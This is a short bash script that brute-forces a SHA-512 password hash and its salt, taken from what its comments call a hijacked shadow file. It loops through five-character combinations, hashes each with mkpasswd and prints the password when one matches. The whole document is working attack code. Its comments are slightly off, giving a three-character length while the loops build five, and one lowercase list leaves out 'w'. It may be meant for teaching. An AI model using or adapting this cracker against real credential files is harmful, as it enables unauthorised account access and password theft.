#!/bin/bash -f

# LIST is the list of characters to try
LIST1="A B C D E F G H I J K L M N O P Q R S T U V W X Y Z"
LIST2="0 1 2 3 4 5 6 7 8 9"
LIST3="a b c d e f g h i j k l m n o p q r s t u v x y z"
LIST4="~ @ # $ % ^ * _ + - = { } [ ] ? ; :"
LIST5="~ @ # $ % ^ * _ + - = { } [ ] ? ; :"

# Assign to the variable encr the encrypted password from the
# hijacked shadow file
encr=`grep sha512 hack.pwd | cut -d":" -f2 | cut -d"$" -f4`
# Assign to the variable salt the salt used to generate the
# encrypted password
salt=`grep sha512 hack.pwd | cut -d":" -f2 | cut -d"$" -f3`

# Assuming we know that the password is 3 alphanumeric long,
# iterate through all possible combinations of plaintext
# password, encrypt it (assign it to the variable test) and
# compare it to the encrypted password that was retrieved as
# the variable encr.
for i in $LIST1
  do
   for j in $LIST2
    do
	for k in $LIST3
	 do
	     for l in $LIST4
              do
                 for m in $LIST5
                   do
	          echo -n "$i$j$k$l$m "
	   
  test=`mkpasswd -m sha-512 $i$j$k$l$m -s $salt | cut -d":" -f2 | cut -d"$" -f4`

		  if [ "$test" == "$encr" ] ; then
			echo "SHA-512 Password is: $i$j$k$l$m"
			echo "Salt value: $salt"
			exit
		  fi
            done
	  done
      done	
   done
done
